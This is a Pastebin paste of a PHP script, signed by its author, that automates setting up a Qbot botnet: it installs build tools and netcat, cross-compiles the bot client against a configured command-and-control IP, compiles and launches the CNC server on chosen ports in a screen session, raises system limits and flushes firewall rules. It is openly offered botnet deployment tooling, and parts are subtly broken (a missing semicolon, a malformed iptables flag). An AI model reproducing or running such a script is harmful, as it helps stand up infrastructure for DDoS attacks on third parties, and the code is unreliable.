Advertisement
vSparkzyy

PHP Qbot Auto Installer by; vSparkzyy

Jul 17th, 2018
950
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.00 KB | None | 0 0
  1. <?php
  2.    
  3. /*
  4.     PHP Qbot Auto Installer By vSparkzyy;
  5. */
  6.  
  7.  
  8. install();
  9.  
  10. function install()
  11. {
  12.     $cnchost = "1.1.1.1";   //cnc server ip
  13.     $cnc = "server.c";   //cnc file name
  14.     $bot = "client.c";   //bot filename
  15.     $compiler = "cc7.py";   //compiler file name
  16.     $botport = "23";   //bot port of choice
  17.     $cncport = "1337";   //cnc port of choice
  18.        
  19.     print "PHP Qbot Auto Installer Script, By vSparkzyy \n";
  20.     sleep(2);
  21.     print "Remember To Edit Settings In PHP File \n";
  22.     sleep(2);
  23.     print "Auto Installer Starting...\n";
  24.     sleep(2);
  25.     system("yum install python gcc screen nc nano wget -y");
  26.     system("python $compiler $bot $cnchost");
  27.     system("gcc -o cnc $cnc -pthread");
  28.     print "Make sure to push CTRL + A + D when in the screen \n";
  29.     sleep(2);
  30.     system("screen ./cnc $botport 100 $cncport");
  31.     sleep(2);
  32.     system("ulimit -n 999999;ulimit -s 999999;ulimit -e 999999;ulimit -e 999999; iptables -Fs")
  33.     print "Qbot auto installer complete by vSparkzyy \n";
  34.     print "Instagram: vsparkzyy \n";
  35.    
  36.  
  37. }
  38.  
  39. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement